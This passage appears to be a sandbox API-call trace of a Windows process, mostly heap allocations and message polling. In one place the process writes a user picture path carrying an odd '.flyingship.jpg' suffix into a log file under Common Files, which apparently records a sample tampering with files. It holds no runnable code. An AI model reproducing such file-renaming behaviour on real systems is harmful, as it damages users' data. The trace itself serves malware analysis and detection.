(in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.906] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.906] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0190.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.907] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.907] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.907] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.907] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.907] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.908] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x30ad, lpOverlapped=0x0) returned 1 [0190.908] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0190.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0190.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\n", cchWideChar=80, lpMultiByteStr=0x923a78, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 80 [0190.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0190.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0190.909] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0190.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0190.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.909] CloseHandle (hObject=0x158) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.911] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.911] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.912] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.913] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.913] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.913] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.913] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.913] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.914] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.916] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 